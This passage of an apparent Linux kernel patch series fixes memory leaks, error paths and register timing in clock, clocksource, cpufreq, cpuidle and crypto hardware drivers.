+ 	DEF_GEN4_SD("sd0",	R8A779F0_CLK_SD0,	R8A779F0_CLK_SD0H, 0x870),
+ 
+ 	DEF_BASE("rpc",		R8A779F0_CLK_RPC,	CLK_TYPE_GEN4_RPC, CLK_RPCSRC),
+@@ -126,10 +126,10 @@ static const struct cpg_core_clk r8a779f0_core_clks[] __initconst = {
+ };
+ 
+ static const struct mssr_mod_clk r8a779f0_mod_clks[] __initconst = {
+-	DEF_MOD("hscif0",	514,	R8A779F0_CLK_S0D3),
+-	DEF_MOD("hscif1",	515,	R8A779F0_CLK_S0D3),
+-	DEF_MOD("hscif2",	516,	R8A779F0_CLK_S0D3),
+-	DEF_MOD("hscif3",	517,	R8A779F0_CLK_S0D3),
++	DEF_MOD("hscif0",	514,	R8A779F0_CLK_SASYNCPERD1),
++	DEF_MOD("hscif1",	515,	R8A779F0_CLK_SASYNCPERD1),
++	DEF_MOD("hscif2",	516,	R8A779F0_CLK_SASYNCPERD1),
++	DEF_MOD("hscif3",	517,	R8A779F0_CLK_SASYNCPERD1),
+ 	DEF_MOD("i2c0",		518,	R8A779F0_CLK_S0D6_PER),
+ 	DEF_MOD("i2c1",		519,	R8A779F0_CLK_S0D6_PER),
+ 	DEF_MOD("i2c2",		520,	R8A779F0_CLK_S0D6_PER),
+@@ -142,10 +142,10 @@ static const struct mssr_mod_clk r8a779f0_mod_clks[] __initconst = {
+ 	DEF_MOD("msiof3",	621,	R8A779F0_CLK_MSO),
+ 	DEF_MOD("pcie0",	624,	R8A779F0_CLK_S0D2),
+ 	DEF_MOD("pcie1",	625,	R8A779F0_CLK_S0D2),
+-	DEF_MOD("scif0",	702,	R8A779F0_CLK_S0D12_PER),
+-	DEF_MOD("scif1",	703,	R8A779F0_CLK_S0D12_PER),
+-	DEF_MOD("scif3",	704,	R8A779F0_CLK_S0D12_PER),
+-	DEF_MOD("scif4",	705,	R8A779F0_CLK_S0D12_PER),
++	DEF_MOD("scif0",	702,	R8A779F0_CLK_SASYNCPERD4),
++	DEF_MOD("scif1",	703,	R8A779F0_CLK_SASYNCPERD4),
++	DEF_MOD("scif3",	704,	R8A779F0_CLK_SASYNCPERD4),
++	DEF_MOD("scif4",	705,	R8A779F0_CLK_SASYNCPERD4),
+ 	DEF_MOD("sdhi0",        706,    R8A779F0_CLK_SD0),
+ 	DEF_MOD("sys-dmac0",	709,	R8A779F0_CLK_S0D3_PER),
+ 	DEF_MOD("sys-dmac1",	710,	R8A779F0_CLK_S0D3_PER),
+diff --git a/drivers/clk/renesas/r9a06g032-clocks.c b/drivers/clk/renesas/r9a06g032-clocks.c
+index 1488c9d6e6394..983faa5707b9c 100644
+--- a/drivers/clk/renesas/r9a06g032-clocks.c
++++ b/drivers/clk/renesas/r9a06g032-clocks.c
+@@ -412,7 +412,7 @@ static int r9a06g032_attach_dev(struct generic_pm_domain *pd,
+ 	int error;
+ 	int index;
+ 
+-	while (!of_parse_phandle_with_args(np, "clocks", "#clock-cells", i,
++	while (!of_parse_phandle_with_args(np, "clocks", "#clock-cells", i++,
+ 					   &clkspec)) {
+ 		if (clkspec.np != pd->dev.of_node)
+ 			continue;
+@@ -425,7 +425,6 @@ static int r9a06g032_attach_dev(struct generic_pm_domain *pd,
+ 			if (error)
+ 				return error;
+ 		}
+-		i++;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/clk/rockchip/clk-pll.c b/drivers/clk/rockchip/clk-pll.c
+index f7827b3b7fc1c..6e5e502be44a6 100644
+--- a/drivers/clk/rockchip/clk-pll.c
++++ b/drivers/clk/rockchip/clk-pll.c
+@@ -981,6 +981,7 @@ struct clk *rockchip_clk_register_pll(struct rockchip_clk_provider *ctx,
+ 	return mux_clk;
+ 
+ err_pll:
++	kfree(pll->rate_table);
+ 	clk_unregister(mux_clk);
+ 	mux_clk = pll_clk;
+ err_mux:
+diff --git a/drivers/clk/samsung/clk-pll.c b/drivers/clk/samsung/clk-pll.c
+index fe383471c5f0a..0ff28938943f0 100644
+--- a/drivers/clk/samsung/clk-pll.c
++++ b/drivers/clk/samsung/clk-pll.c
+@@ -1583,6 +1583,7 @@ static void __init _samsung_clk_register_pll(struct samsung_clk_provider *ctx,
+ 	if (ret) {
+ 		pr_err("%s: failed to register pll clock %s : %d\n",
+ 			__func__, pll_clk->name, ret);
++		kfree(pll->rate_table);
+ 		kfree(pll);
+ 		return;
+ 	}
+diff --git a/drivers/clk/socfpga/clk-gate.c b/drivers/clk/socfpga/clk-gate.c
+index 53d6e3ec4309f..c94b59b80dd43 100644
+--- a/drivers/clk/socfpga/clk-gate.c
++++ b/drivers/clk/socfpga/clk-gate.c
+@@ -188,8 +188,10 @@ void __init socfpga_gate_init(struct device_node *node)
+ 		return;
+ 
+ 	ops = kmemdup(&gateclk_ops, sizeof(gateclk_ops), GFP_KERNEL);
+-	if (WARN_ON(!ops))
++	if (WARN_ON(!ops)) {
++		kfree(socfpga_clk);
+ 		return;
++	}
+ 
+ 	rc = of_property_read_u32_array(node, "clk-gate", clk_gate, 2);
+ 	if (rc)
+@@ -243,6 +245,7 @@ void __init socfpga_gate_init(struct device_node *node)
+ 
+ 	err = clk_hw_register(NULL, hw_clk);
+ 	if (err) {
++		kfree(ops);
+ 		kfree(socfpga_clk);
+ 		return;
+ 	}
+diff --git a/drivers/clk/st/clkgen-fsyn.c b/drivers/clk/st/clkgen-fsyn.c
+index d820292a381d0..40df1db102a77 100644
+--- a/drivers/clk/st/clkgen-fsyn.c
++++ b/drivers/clk/st/clkgen-fsyn.c
+@@ -1020,9 +1020,10 @@ static void __init st_of_quadfs_setup(struct device_node *np,
+ 
+ 	clk = st_clk_register_quadfs_pll(pll_name, clk_parent_name, datac->data,
+ 			reg, lock);
+-	if (IS_ERR(clk))
++	if (IS_ERR(clk)) {
++		kfree(lock);
+ 		goto err_exit;
+-	else
++	} else
+ 		pr_debug("%s: parent %s rate %u\n",
+ 			__clk_get_name(clk),
+ 			__clk_get_name(clk_get_parent(clk)),
+diff --git a/drivers/clk/visconti/pll.c b/drivers/clk/visconti/pll.c
+index a484cb945d67b..1f3234f226674 100644
+--- a/drivers/clk/visconti/pll.c
++++ b/drivers/clk/visconti/pll.c
+@@ -277,6 +277,7 @@ static struct clk_hw *visconti_register_pll(struct visconti_pll_provider *ctx,
+ 	ret = clk_hw_register(NULL, &pll->hw);
+ 	if (ret) {
+ 		pr_err("failed to register pll clock %s : %d\n", name, ret);
++		kfree(pll->rate_table);
+ 		kfree(pll);
+ 		pll_hw_clk = ERR_PTR(ret);
+ 	}
+diff --git a/drivers/clocksource/sh_cmt.c b/drivers/clocksource/sh_cmt.c
+index 64dcb082d4cf6..7b952aa52c0b9 100644
+--- a/drivers/clocksource/sh_cmt.c
++++ b/drivers/clocksource/sh_cmt.c
+@@ -13,6 +13,7 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/ioport.h>
+ #include <linux/irq.h>
+ #include <linux/module.h>
+@@ -116,6 +117,7 @@ struct sh_cmt_device {
+ 	void __iomem *mapbase;
+ 	struct clk *clk;
+ 	unsigned long rate;
++	unsigned int reg_delay;
+ 
+ 	raw_spinlock_t lock; /* Protect the shared start/stop register */
+ 
+@@ -247,10 +249,17 @@ static inline u32 sh_cmt_read_cmstr(struct sh_cmt_channel *ch)
+ 
+ static inline void sh_cmt_write_cmstr(struct sh_cmt_channel *ch, u32 value)
+ {
+-	if (ch->iostart)
+-		ch->cmt->info->write_control(ch->iostart, 0, value);
+-	else
+-		ch->cmt->info->write_control(ch->cmt->mapbase, 0, value);
++	u32 old_value = sh_cmt_read_cmstr(ch);
++
++	if (value != old_value) {
++		if (ch->iostart) {
++			ch->cmt->info->write_control(ch->iostart, 0, value);
++			udelay(ch->cmt->reg_delay);
++		} else {
++			ch->cmt->info->write_control(ch->cmt->mapbase, 0, value);
++			udelay(ch->cmt->reg_delay);
++		}
++	}
+ }
+ 
+ static inline u32 sh_cmt_read_cmcsr(struct sh_cmt_channel *ch)
+@@ -260,7 +269,12 @@ static inline u32 sh_cmt_read_cmcsr(struct sh_cmt_channel *ch)
+ 
+ static inline void sh_cmt_write_cmcsr(struct sh_cmt_channel *ch, u32 value)
+ {
+-	ch->cmt->info->write_control(ch->ioctrl, CMCSR, value);
++	u32 old_value = sh_cmt_read_cmcsr(ch);
++
++	if (value != old_value) {
++		ch->cmt->info->write_control(ch->ioctrl, CMCSR, value);
++		udelay(ch->cmt->reg_delay);
++	}
+ }
+ 
+ static inline u32 sh_cmt_read_cmcnt(struct sh_cmt_channel *ch)
+@@ -268,14 +282,33 @@ static inline u32 sh_cmt_read_cmcnt(struct sh_cmt_channel *ch)
+ 	return ch->cmt->info->read_count(ch->ioctrl, CMCNT);
+ }
+ 
+-static inline void sh_cmt_write_cmcnt(struct sh_cmt_channel *ch, u32 value)
++static inline int sh_cmt_write_cmcnt(struct sh_cmt_channel *ch, u32 value)
+ {
++	/* Tests showed that we need to wait 3 clocks here */
++	unsigned int cmcnt_delay = DIV_ROUND_UP(3 * ch->cmt->reg_delay, 2);
++	u32 reg;
++
++	if (ch->cmt->info->model > SH_CMT_16BIT) {
++		int ret = read_poll_timeout_atomic(sh_cmt_read_cmcsr, reg,
++						   !(reg & SH_CMT32_CMCSR_WRFLG),
++						   1, cmcnt_delay, false, ch);
++		if (ret < 0)
++			return ret;
++	}
++
+ 	ch->cmt->info->write_count(ch->ioctrl, CMCNT, value);
++	udelay(cmcnt_delay);
++	return 0;
+ }
+ 
+ static inline void sh_cmt_write_cmcor(struct sh_cmt_channel *ch, u32 value)
+ {
+-	ch->cmt->info->write_count(ch->ioctrl, CMCOR, value);
++	u32 old_value = ch->cmt->info->read_count(ch->ioctrl, CMCOR);
++
++	if (value != old_value) {
++		ch->cmt->info->write_count(ch->ioctrl, CMCOR, value);
++		udelay(ch->cmt->reg_delay);
++	}
+ }
+ 
+ static u32 sh_cmt_get_counter(struct sh_cmt_channel *ch, u32 *has_wrapped)
+@@ -319,7 +352,7 @@ static void sh_cmt_start_stop_ch(struct sh_cmt_channel *ch, int start)
+ 
+ static int sh_cmt_enable(struct sh_cmt_channel *ch)
+ {
+-	int k, ret;
++	int ret;
+ 
+ 	dev_pm_syscore_device(&ch->cmt->pdev->dev, true);
+ 
+@@ -347,26 +380,9 @@ static int sh_cmt_enable(struct sh_cmt_channel *ch)
+ 	}
+ 
+ 	sh_cmt_write_cmcor(ch, 0xffffffff);
+-	sh_cmt_write_cmcnt(ch, 0);
+-
+-	/*
+-	 * According to the sh73a0 user's manual, as CMCNT can be operated
+-	 * only by the RCLK (Pseudo 32 kHz), there's one restriction on
+-	 * modifying CMCNT register; two RCLK cycles are necessary before
+-	 * this register is either read or any modification of the value
+-	 * it holds is reflected in the LSI's actual operation.
+-	 *
+-	 * While at it, we're supposed to clear out the CMCNT as of this
+-	 * moment, so make sure it's processed properly here.  This will
+-	 * take RCLKx2 at maximum.
+-	 */
+-	for (k = 0; k < 100; k++) {
+-		if (!sh_cmt_read_cmcnt(ch))
+-			break;
+-		udelay(1);
+-	}
++	ret = sh_cmt_write_cmcnt(ch, 0);
+ 
+-	if (sh_cmt_read_cmcnt(ch)) {
++	if (ret || sh_cmt_read_cmcnt(ch)) {
+ 		dev_err(&ch->cmt->pdev->dev, "ch%u: cannot clear CMCNT\n",
+ 			ch->index);
+ 		ret = -ETIMEDOUT;
+@@ -995,8 +1011,8 @@ MODULE_DEVICE_TABLE(of, sh_cmt_of_table);
+ 
+ static int sh_cmt_setup(struct sh_cmt_device *cmt, struct platform_device *pdev)
+ {
+-	unsigned int mask;
+-	unsigned int i;
++	unsigned int mask, i;
++	unsigned long rate;
+ 	int ret;
+ 
+ 	cmt->pdev = pdev;
+@@ -1032,10 +1048,16 @@ static int sh_cmt_setup(struct sh_cmt_device *cmt, struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto err_clk_unprepare;
+ 
+-	if (cmt->info->width == 16)
+-		cmt->rate = clk_get_rate(cmt->clk) / 512;
+-	else
+-		cmt->rate = clk_get_rate(cmt->clk) / 8;
++	rate = clk_get_rate(cmt->clk);
++	if (!rate) {
++		ret = -EINVAL;
++		goto err_clk_disable;
++	}
++
++	/* We shall wait 2 input clks after register writes */
++	if (cmt->info->model >= SH_CMT_48BIT)
++		cmt->reg_delay = DIV_ROUND_UP(2UL * USEC_PER_SEC, rate);
++	cmt->rate = rate / (cmt->info->width == 16 ? 512 : 8);
+ 
+ 	/* Map the memory resource(s). */
+ 	ret = sh_cmt_map_memory(cmt);
+diff --git a/drivers/clocksource/timer-ti-dm-systimer.c b/drivers/clocksource/timer-ti-dm-systimer.c
+index 2737407ff0698..632523c1232f6 100644
+--- a/drivers/clocksource/timer-ti-dm-systimer.c
++++ b/drivers/clocksource/timer-ti-dm-systimer.c
+@@ -345,8 +345,10 @@ static int __init dmtimer_systimer_init_clock(struct dmtimer_systimer *t,
+ 		return error;
+ 
+ 	r = clk_get_rate(clock);
+-	if (!r)
++	if (!r) {
++		clk_disable_unprepare(clock);
+ 		return -ENODEV;
++	}
+ 
+ 	if (is_ick)
+ 		t->ick = clock;
+diff --git a/drivers/clocksource/timer-ti-dm.c b/drivers/clocksource/timer-ti-dm.c
+index cad29ded3a48f..00af1a8e34fbd 100644
+--- a/drivers/clocksource/timer-ti-dm.c
++++ b/drivers/clocksource/timer-ti-dm.c
+@@ -1258,7 +1258,7 @@ static struct platform_driver omap_dm_timer_driver = {
+ 	.remove = omap_dm_timer_remove,
+ 	.driver = {
+ 		.name   = "omap_timer",
+-		.of_match_table = of_match_ptr(omap_timer_match),
++		.of_match_table = omap_timer_match,
+ 		.pm = &omap_dm_timer_pm_ops,
+ 	},
+ };
+diff --git a/drivers/counter/stm32-lptimer-cnt.c b/drivers/counter/stm32-lptimer-cnt.c
+index d6b80b6dfc287..8439755559b21 100644
+--- a/drivers/counter/stm32-lptimer-cnt.c
++++ b/drivers/counter/stm32-lptimer-cnt.c
+@@ -69,7 +69,7 @@ static int stm32_lptim_set_enable_state(struct stm32_lptim_cnt *priv,
+ 
+ 	/* ensure CMP & ARR registers are properly written */
+ 	ret = regmap_read_poll_timeout(priv->regmap, STM32_LPTIM_ISR, val,
+-				       (val & STM32_LPTIM_CMPOK_ARROK),
++				       (val & STM32_LPTIM_CMPOK_ARROK) == STM32_LPTIM_CMPOK_ARROK,
+ 				       100, 1000);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/cpufreq/amd_freq_sensitivity.c b/drivers/cpufreq/amd_freq_sensitivity.c
+index 6448e03bcf488..59b19b9975e8c 100644
+--- a/drivers/cpufreq/amd_freq_sensitivity.c
++++ b/drivers/cpufreq/amd_freq_sensitivity.c
+@@ -125,6 +125,8 @@ static int __init amd_freq_sensitivity_init(void)
+ 	if (!pcidev) {
+ 		if (!boot_cpu_has(X86_FEATURE_PROC_FEEDBACK))
+ 			return -ENODEV;
++	} else {
++		pci_dev_put(pcidev);
+ 	}
+ 
+ 	if (rdmsrl_safe(MSR_AMD64_FREQ_SENSITIVITY_ACTUAL, &val))
+diff --git a/drivers/cpufreq/qcom-cpufreq-hw.c b/drivers/cpufreq/qcom-cpufreq-hw.c
+index 833589bc95e40..3c623a0bc147f 100644
+--- a/drivers/cpufreq/qcom-cpufreq-hw.c
++++ b/drivers/cpufreq/qcom-cpufreq-hw.c
+@@ -125,7 +125,35 @@ static int qcom_cpufreq_hw_target_index(struct cpufreq_policy *policy,
+ 	return 0;
+ }
+ 
++static unsigned long qcom_lmh_get_throttle_freq(struct qcom_cpufreq_data *data)
++{
++	unsigned int lval;
++
++	if (data->soc_data->reg_current_vote)
++		lval = readl_relaxed(data->base + data->soc_data->reg_current_vote) & 0x3ff;
++	else
++		lval = readl_relaxed(data->base + data->soc_data->reg_domain_state) & 0xff;
++
++	return lval * xo_rate;
++}
++
++/* Get the current frequency of the CPU (after throttling) */
+ static unsigned int qcom_cpufreq_hw_get(unsigned int cpu)
++{
++	struct qcom_cpufreq_data *data;
++	struct cpufreq_policy *policy;
++
++	policy = cpufreq_cpu_get_raw(cpu);
++	if (!policy)
++		return 0;
++
++	data = policy->driver_data;
++
++	return qcom_lmh_get_throttle_freq(data) / HZ_PER_KHZ;
++}
++
++/* Get the frequency requested by the cpufreq core for the CPU */
++static unsigned int qcom_cpufreq_get_freq(unsigned int cpu)
+ {
+ 	struct qcom_cpufreq_data *data;
+ 	const struct qcom_cpufreq_soc_data *soc_data;
+@@ -193,6 +221,7 @@ static int qcom_cpufreq_hw_read_lut(struct device *cpu_dev,
+ 		}
+ 	} else if (ret != -ENODEV) {
+ 		dev_err(cpu_dev, "Invalid opp table in device tree\n");
++		kfree(table);
+ 		return ret;
+ 	} else {
+ 		policy->fast_switch_possible = true;
+@@ -286,18 +315,6 @@ static void qcom_get_related_cpus(int index, struct cpumask *m)
+ 	}
+ }
+ 
+-static unsigned long qcom_lmh_get_throttle_freq(struct qcom_cpufreq_data *data)
+-{
+-	unsigned int lval;
+-
+-	if (data->soc_data->reg_current_vote)
+-		lval = readl_relaxed(data->base + data->soc_data->reg_current_vote) & 0x3ff;
+-	else
+-		lval = readl_relaxed(data->base + data->soc_data->reg_domain_state) & 0xff;
+-
+-	return lval * xo_rate;
+-}
+-
+ static void qcom_lmh_dcvs_notify(struct qcom_cpufreq_data *data)
+ {
+ 	struct cpufreq_policy *policy = data->policy;
+@@ -341,7 +358,7 @@ static void qcom_lmh_dcvs_notify(struct qcom_cpufreq_data *data)
+ 	 * If h/w throttled frequency is higher than what cpufreq has requested
+ 	 * for, then stop polling and switch back to interrupt mechanism.
+ 	 */
+-	if (throttled_freq >= qcom_cpufreq_hw_get(cpu))
++	if (throttled_freq >= qcom_cpufreq_get_freq(cpu))
+ 		enable_irq(data->throttle_irq);
+ 	else
+ 		mod_delayed_work(system_highpri_wq, &data->throttle_work,
+diff --git a/drivers/cpuidle/dt_idle_states.c b/drivers/cpuidle/dt_idle_states.c
+index 252f2a9686a62..448bc796b0b40 100644
+--- a/drivers/cpuidle/dt_idle_states.c
++++ b/drivers/cpuidle/dt_idle_states.c
+@@ -223,6 +223,6 @@ int dt_init_idle_driver(struct cpuidle_driver *drv,
+ 	 * also be 0 on platforms with missing DT idle states or legacy DT
+ 	 * configuration predating the DT idle states bindings.
+ 	 */
+-	return i;
++	return state_idx - start_idx;
+ }
+ EXPORT_SYMBOL_GPL(dt_init_idle_driver);
+diff --git a/drivers/crypto/Kconfig b/drivers/crypto/Kconfig
+index 55e75fbb658ee..c30b5a39c2ac2 100644
+--- a/drivers/crypto/Kconfig
++++ b/drivers/crypto/Kconfig
+@@ -669,7 +669,12 @@ config CRYPTO_DEV_IMGTEC_HASH
+ config CRYPTO_DEV_ROCKCHIP
+ 	tristate "Rockchip's Cryptographic Engine driver"
+ 	depends on OF && ARCH_ROCKCHIP
++	depends on PM
++	select CRYPTO_ECB
++	select CRYPTO_CBC
++	select CRYPTO_DES
+ 	select CRYPTO_AES
++	select CRYPTO_ENGINE
+ 	select CRYPTO_LIB_DES
+ 	select CRYPTO_MD5
+ 	select CRYPTO_SHA1
+diff --git a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+index 910d6751644cf..902f6be057ec6 100644
+--- a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
++++ b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+@@ -124,7 +124,7 @@ static int sun8i_ss_setup_ivs(struct skcipher_request *areq)
+ 	unsigned int ivsize = crypto_skcipher_ivsize(tfm);
+ 	struct sun8i_ss_flow *sf = &ss->flows[rctx->flow];
+ 	int i = 0;
+-	u32 a;
++	dma_addr_t a;
+ 	int err;
+ 
+ 	rctx->ivlen = ivsize;
+diff --git a/drivers/crypto/amlogic/amlogic-gxl-core.c b/drivers/crypto/amlogic/amlogic-gxl-core.c
+index 6e7ae896717cd..937187027ad57 100644
+--- a/drivers/crypto/amlogic/amlogic-gxl-core.c
++++ b/drivers/crypto/amlogic/amlogic-gxl-core.c
+@@ -237,7 +237,6 @@ static int meson_crypto_probe(struct platform_device *pdev)
+ 		return err;
+ 	}
+ 
+-	mc->irqs = devm_kcalloc(mc->dev, MAXFLOW, sizeof(int), GFP_KERNEL);
+ 	for (i = 0; i < MAXFLOW; i++) {
+ 		mc->irqs[i] = platform_get_irq(pdev, i);
+ 		if (mc->irqs[i] < 0)
+diff --git a/drivers/crypto/amlogic/amlogic-gxl.h b/drivers/crypto/amlogic/amlogic-gxl.h
+index dc0f142324a3c..8c0746a1d6d43 100644
+--- a/drivers/crypto/amlogic/amlogic-gxl.h
++++ b/drivers/crypto/amlogic/amlogic-gxl.h
+@@ -95,7 +95,7 @@ struct meson_dev {
+ 	struct device *dev;
+ 	struct meson_flow *chanlist;
+ 	atomic_t flow;
+-	int *irqs;
++	int irqs[MAXFLOW];
+ #ifdef CONFIG_CRYPTO_DEV_AMLOGIC_GXL_DEBUG
+ 	struct dentry *dbgfs_dir;
+ #endif
+diff --git a/drivers/crypto/cavium/nitrox/nitrox_mbx.c b/drivers/crypto/cavium/nitrox/nitrox_mbx.c
+index 9e7308e39b304..d4e06999af9b7 100644
+--- a/drivers/crypto/cavium/nitrox/nitrox_mbx.c
++++ b/drivers/crypto/cavium/nitrox/nitrox_mbx.c
+@@ -195,6 +195,7 @@ int nitrox_mbox_init(struct nitrox_device *ndev)
+ 	ndev->iov.pf2vf_wq = alloc_workqueue("nitrox_pf2vf", 0, 0);
+ 	if (!ndev->iov.pf2vf_wq) {
+ 		kfree(ndev->iov.vfdev);
++		ndev->iov.vfdev = NULL;
+ 		return -ENOMEM;
+ 	}
+ 	/* enable pf2vf mailbox interrupts */
+diff --git a/drivers/crypto/ccree/cc_debugfs.c b/drivers/crypto/ccree/cc_debugfs.c
+index 7083767602fcf..8f008f024f8f1 100644
+--- a/drivers/crypto/ccree/cc_debugfs.c
++++ b/drivers/crypto/ccree/cc_debugfs.c
+@@ -55,7 +55,7 @@ void __init cc_debugfs_global_init(void)
+ 	cc_debugfs_dir = debugfs_create_dir("ccree", NULL);
+ }
+ 
+-void __exit cc_debugfs_global_fini(void)
++void cc_debugfs_global_fini(void)
+ {
+ 	debugfs_remove(cc_debugfs_dir);
+ }
+diff --git a/drivers/crypto/ccree/cc_driver.c b/drivers/crypto/ccree/cc_driver.c
+index cadead18b59e8..d489c6f808925 100644
+--- a/drivers/crypto/ccree/cc_driver.c
++++ b/drivers/crypto/ccree/cc_driver.c
+@@ -651,9 +651,17 @@ static struct platform_driver ccree_driver = {
+ 
+ static int __init ccree_init(void)
+ {
++	int rc;
++
+ 	cc_debugfs_global_init();
+ 
+-	return platform_driver_register(&ccree_driver);
++	rc = platform_driver_register(&ccree_driver);
++	if (rc) {
++		cc_debugfs_global_fini();
++		return rc;
++	}
++
++	return 0;
+ }
+ module_init(ccree_init);
+ 
+diff --git a/drivers/crypto/hisilicon/hpre/hpre_main.c b/drivers/crypto/hisilicon/hpre/hpre_main.c
+index 471e5ca720f57..baf1faec7046f 100644
+--- a/drivers/crypto/hisilicon/hpre/hpre_main.c
++++ b/drivers/crypto/hisilicon/hpre/hpre_main.c
+@@ -1437,18 +1437,12 @@ err_with_qm_init:
+ static void hpre_remove(struct pci_dev *pdev)
+ {
+ 	struct hisi_qm *qm = pci_get_drvdata(pdev);
+-	int ret;
+ 
+ 	hisi_qm_pm_uninit(qm);
+ 	hisi_qm_wait_task_finish(qm, &hpre_devices);
+ 	hisi_qm_alg_unregister(qm, &hpre_devices);
+-	if (qm->fun_type == QM_HW_PF && qm->vfs_num) {
+-		ret = hisi_qm_sriov_disable(pdev, true);
+-		if (ret) {
+-			pci_err(pdev, "Disable SRIOV fail!\n");
+-			return;
+-		}
+-	}
++	if (qm->fun_type == QM_HW_PF && qm->vfs_num)
++		hisi_qm_sriov_disable(pdev, true);
+ 
+ 	hpre_debugfs_exit(qm);
+ 	hisi_qm_stop(qm, QM_NORMAL);
+diff --git a/drivers/crypto/hisilicon/qm.c b/drivers/crypto/hisilicon/qm.c
+index 8b387de69d229..07e1e39a5e378 100644
+--- a/drivers/crypto/hisilicon/qm.c
++++ b/drivers/crypto/hisilicon/qm.c
+@@ -250,7 +250,6 @@
+ #define QM_QOS_MIN_CIR_B		100
+ #define QM_QOS_MAX_CIR_U		6
+ #define QM_QOS_MAX_CIR_S		11
+-#define QM_QOS_VAL_MAX_LEN		32
+ #define QM_DFX_BASE		0x0100000
+ #define QM_DFX_STATE1		0x0104000
+ #define QM_DFX_STATE2		0x01040C8
+@@ -359,7 +358,7 @@ static const struct hisi_qm_cap_info qm_cap_info_vf[] = {
+ static const struct hisi_qm_cap_info qm_basic_info[] = {
+ 	{QM_TOTAL_QP_NUM_CAP,   0x100158, 0,  GENMASK(10, 0), 0x1000,    0x400,     0x400},
+ 	{QM_FUNC_MAX_QP_CAP,    0x100158, 11, GENMASK(10, 0), 0x1000,    0x400,     0x400},
+-	{QM_XEQ_DEPTH_CAP,      0x3104,   0,  GENMASK(15, 0), 0x800,     0x4000800, 0x4000800},
++	{QM_XEQ_DEPTH_CAP,      0x3104,   0,  GENMASK(31, 0), 0x800,     0x4000800, 0x4000800},
+ 	{QM_QP_DEPTH_CAP,       0x3108,   0,  GENMASK(31, 0), 0x4000400, 0x4000400, 0x4000400},
+ 	{QM_EQ_IRQ_TYPE_CAP,    0x310c,   0,  GENMASK(31, 0), 0x10000,   0x10000,   0x10000},
+ 	{QM_AEQ_IRQ_TYPE_CAP,   0x3110,   0,  GENMASK(31, 0), 0x0,       0x10001,   0x10001},
+@@ -909,8 +908,8 @@ static void qm_get_xqc_depth(struct hisi_qm *qm, u16 *low_bits,
+ 	u32 depth;
+ 
+ 	depth = hisi_qm_get_hw_info(qm, qm_basic_info, type, qm->cap_ver);
+-	*high_bits = depth & QM_XQ_DEPTH_MASK;
+-	*low_bits = (depth >> QM_XQ_DEPTH_SHIFT) & QM_XQ_DEPTH_MASK;
++	*low_bits = depth & QM_XQ_DEPTH_MASK;
++	*high_bits = (depth >> QM_XQ_DEPTH_SHIFT) & QM_XQ_DEPTH_MASK;
+ }
+ 
+ static u32 qm_get_irq_num(struct hisi_qm *qm)
+@@ -4614,7 +4613,7 @@ static ssize_t qm_get_qos_value(struct hisi_qm *qm, const char *buf,
+ 			       unsigned int *fun_index)
+ {
+ 	char tbuf_bdf[QM_DBG_READ_LEN] = {0};
+-	char val_buf[QM_QOS_VAL_MAX_LEN] = {0};
++	char val_buf[QM_DBG_READ_LEN] = {0};
+ 	u32 tmp1, device, function;
+ 	int ret, bus;
+ 
+@@ -5725,6 +5724,7 @@ static void qm_pf_reset_vf_done(struct hisi_qm *qm)
+ 		cmd = QM_VF_START_FAIL;
+ 	}
+ 
++	qm_cmd_init(qm);
+ 	ret = qm_ping_pf(qm, cmd);
+ 	if (ret)
+ 		dev_warn(&pdev->dev, "PF responds timeout in reset done!\n");
+@@ -5786,7 +5786,6 @@ static void qm_pf_reset_vf_process(struct hisi_qm *qm,
+ 		goto err_get_status;
+ 
+ 	qm_pf_reset_vf_done(qm);
+-	qm_cmd_init(qm);
+ 
+ 	dev_info(dev, "device reset done.\n");
+ 
+diff --git a/drivers/crypto/img-hash.c b/drivers/crypto/img-hash.c
+index d8e82d69745d8..9629e98bd68b7 100644
+--- a/drivers/crypto/img-hash.c
++++ b/drivers/crypto/img-hash.c
+@@ -358,12 +358,16 @@ static int img_hash_dma_init(struct img_hash_dev *hdev)
+ static void img_hash_dma_task(unsigned long d)
+ {
+ 	struct img_hash_dev *hdev = (struct img_hash_dev *)d;
+-	struct img_hash_request_ctx *ctx = ahash_request_ctx(hdev->req);
++	struct img_hash_request_ctx *ctx;
+ 	u8 *addr;
+ 	size_t nbytes, bleft, wsend, len, tbc;
+ 	struct scatterlist tsg;
+ 
+-	if (!hdev->req || !ctx->sg)
++	if (!hdev->req)
++		return;
++
++	ctx = ahash_request_ctx(hdev->req);
++	if (!ctx->sg)
+ 		return;
+ 
+ 	addr = sg_virt(ctx->sg);
+diff --git a/drivers/crypto/omap-sham.c b/drivers/crypto/omap-sham.c
+index 655a7f5a406a1..cbeda59c6b191 100644
+--- a/drivers/crypto/omap-sham.c
++++ b/drivers/crypto/omap-sham.c
+@@ -2114,7 +2114,7 @@ static int omap_sham_probe(struct platform_device *pdev)
+ 
+ 	pm_runtime_enable(dev);
+ 
+-	err = pm_runtime_get_sync(dev);
++	err = pm_runtime_resume_and_get(dev);
+ 	if (err < 0) {
+ 		dev_err(dev, "failed to get sync: %d\n", err);
+ 		goto err_pm;
+diff --git a/drivers/crypto/qat/qat_4xxx/adf_drv.c b/drivers/crypto/qat/qat_4xxx/adf_drv.c
+index 2f212561acc47..670a58b25cb16 100644
+--- a/drivers/crypto/qat/qat_4xxx/adf_drv.c
++++ b/drivers/crypto/qat/qat_4xxx/adf_drv.c
+@@ -261,6 +261,7 @@ static int adf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	hw_data->accel_capabilities_mask = hw_data->get_accel_cap(accel_dev);
+ 	if (!hw_data->accel_capabilities_mask) {
+ 		dev_err(&pdev->dev, "Failed to get capabilities mask.\n");
++		ret = -EINVAL;
+ 		goto out_err;
+ 	}
+ 
+diff --git a/drivers/crypto/rockchip/rk3288_crypto.c b/drivers/crypto/rockchip/rk3288_crypto.c
+index 35d73061d1569..14a0aef18ab13 100644
+--- a/drivers/crypto/rockchip/rk3288_crypto.c
++++ b/drivers/crypto/rockchip/rk3288_crypto.c
+@@ -65,186 +65,24 @@ static void rk_crypto_disable_clk(struct rk_crypto_info *dev)
